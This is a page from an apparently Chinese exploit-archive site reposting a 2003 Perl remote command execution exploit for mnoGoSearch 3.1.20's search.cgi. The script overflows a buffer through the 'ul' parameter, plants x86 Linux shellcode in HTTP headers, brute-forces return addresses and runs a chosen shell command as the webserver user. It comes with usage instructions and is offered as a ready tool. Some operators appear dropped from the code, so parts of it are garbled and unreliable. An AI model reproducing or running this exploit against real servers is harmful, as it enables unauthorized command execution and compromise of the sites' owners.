首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
0day :: oday

mnoGoSearch 3.1.20 Remote Command Execution Exploit


http://www.gipsky.com/
#!/usr/bin/perl

#

# [ reloaded ]

# Remote Exploit for mnoGoSearch 3.1.20 that performs

# remote command execution as the webserver user id

# for linux ix86

# by pokleyzz

#



use IO::Socket;



$host = "127.0.0.1";

$cmd = "ls -la";

$searchpath = "/cgi-bin/search.cgi";

$rawret = 0xbfff105c;

$ret = "";

$suffsize = 0;

$port = 80;



my $conn;





if ($ARGV[0]){

$host = $ARGV[0];

}

else {

print "[x] mnogosearch 3.1.x exploit for linux ix86 \n\tby pokleyzz\n\n";

print "Usage:\n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]\n";

print "\thost\thostname to exploit\n";

print "\tcommand\tcommand to execute on server\n";

print "\tpath\tpath to search.cgi default /cgi-bin/search.cgi\n";

print "\tport\tport to connect to\n";

print "\tsuff\tif not success try to use 1, 2 or 3 for suff (default is 0)\n";

print "\tret\treturn address default bfffd0d0\n";

exit;

}



if ($ARGV[1]){

$cmd = $ARGV[1];

}

if ($ARGV[2]){

$searchpath = $ARGV[2];

}

if ($ARGV[3]){

$port = int($ARGV[3]);

}

if ($ARGV[4]){

$suffsize = int($ARGV[4]);

}

if ($ARGV[5]){

$rawret = hex_to_int($ARGV[5]);

}



#########~~ start function ~~#########

sub hex_to_int {

my $hs = $_[0];

$int = (hex(substr($hs, 0, 2)) << 24) (hex(substr($hs, 2, 2)) << 16)

(hex(substr($hs, 4, 2)) << 8) hex(substr($hs, 6, 2));



}



sub int_to_hex {

my $in = $_[0];

$hex = sprintf "%x",$in;

}



sub string_to_ret {

my $rawret = $_[0];

if (length($rawret) != 8){

print $rawret;

die "[*] incorrect return address ...\n ";

} else {

$ret = chr(hex(substr($rawret, 2, 2)));

$ret .= chr(hex(substr($rawret, 0, 2)));

$ret .= chr(hex(substr($rawret, 6, 2)));

$ret .= chr(hex(substr($rawret, 4, 2)));



}



}



sub connect_to {

#print "[x] Connect to $host on port $port ...\n";

$conn = IO::Socket::INET->new (

Proto => "tcp",

PeerAddr => "$host",

PeerPort => "$port",

) or die "[*] Can't connect to $host on port $port ...\n";

$conn-> autoflush(1);

}



sub check_version {

my $result;

connect_to();

print "[x] Check if $host use correct version ...\n";

print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1\nHost: $host\nConnection: Close\n\n";



# capture result

while ($line = <$conn>) {

$result .= $line;

};



close $conn;

if ($result =~ /_test_/){

print "[x] Correct version detected .. possibly vulnerable ...\n";

} else {

print $result;

die "[x] New version or wrong url\n";

}

}



sub exploit {

my $rw = $_[0];

$result = "";

# linux ix86 shellcode rip from phx.c by proton

$shellcode = "\xeb\x3b\x5e\x8d\x5e\x10\x89\x1e\x8d\x7e\x18\x89\x7e\x04\x8d\x7e\x1b\x89\x7e\x08"

."\xb8\x40\x40\x40\x40\x47\x8a\x07\x28\xe0\x75\xf9\x31\xc0\x88\x07\x89\x46\x0c\x88"

."\x46\x17\x88\x46\x1a\x89\xf1\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

."\x80\xe8\xc0\xff\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"

."\x41\x41"

."/bin/sh -c echo 'Content-Type: text/hello';echo '';"

."$cmd"

."@";

$strret = int_to_hex($rw);

$ret = string_to_ret($strret);

$envvar = 'B' x (4096 - length($shellcode));

$envvar .= $shellcode;



# generate query string

$buffer = "B" x $suffsize;

$buffer .= "B" x 4800;

$buffer .= $ret x 200;



$request = "GET $searchpath?ul=$buffer HTTP/1.1\n"

."Accept: $envvar\n"

."Accept-Language: $envvar\n"

."Accept-Encoding: $envvar\n"

."User-Agent: Mozilla/4.0\n"

."Host: $host\n"

."Connection: Close\n\n";



&connect_to;

print "[x] Sending exploit code ..\n";

print "[x] ret: $strret\n";

print "[x] suf: $suffsize\n";

print "[x] length:",length($request),"\n";

print $conn "$request";

while ($line = <$conn>) {

$result .= $line;

};

close $conn;



}



sub check_result {

if ($result =~ /hello/ && !($result =~ /text\/html/)){

print $result;

$success = 1;

} else {

print $result;

print "[*] Failed ...\n";

$success = 0;

}

}

#########~~ end function ~~#########



&check_version;

for ($rawret; $rawret < 0xbfffffff;$rawret = 1024){

&exploit($rawret);

&check_result;

if ($success == 1){

exit;

}

sleep 1;

}

[2003-06-10]
<< Mandrake Linux 8.2 /usr/mail local exploit (d86mail.pl) Winmail Mail Server 2.3 Remote Format String Exploit >>
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8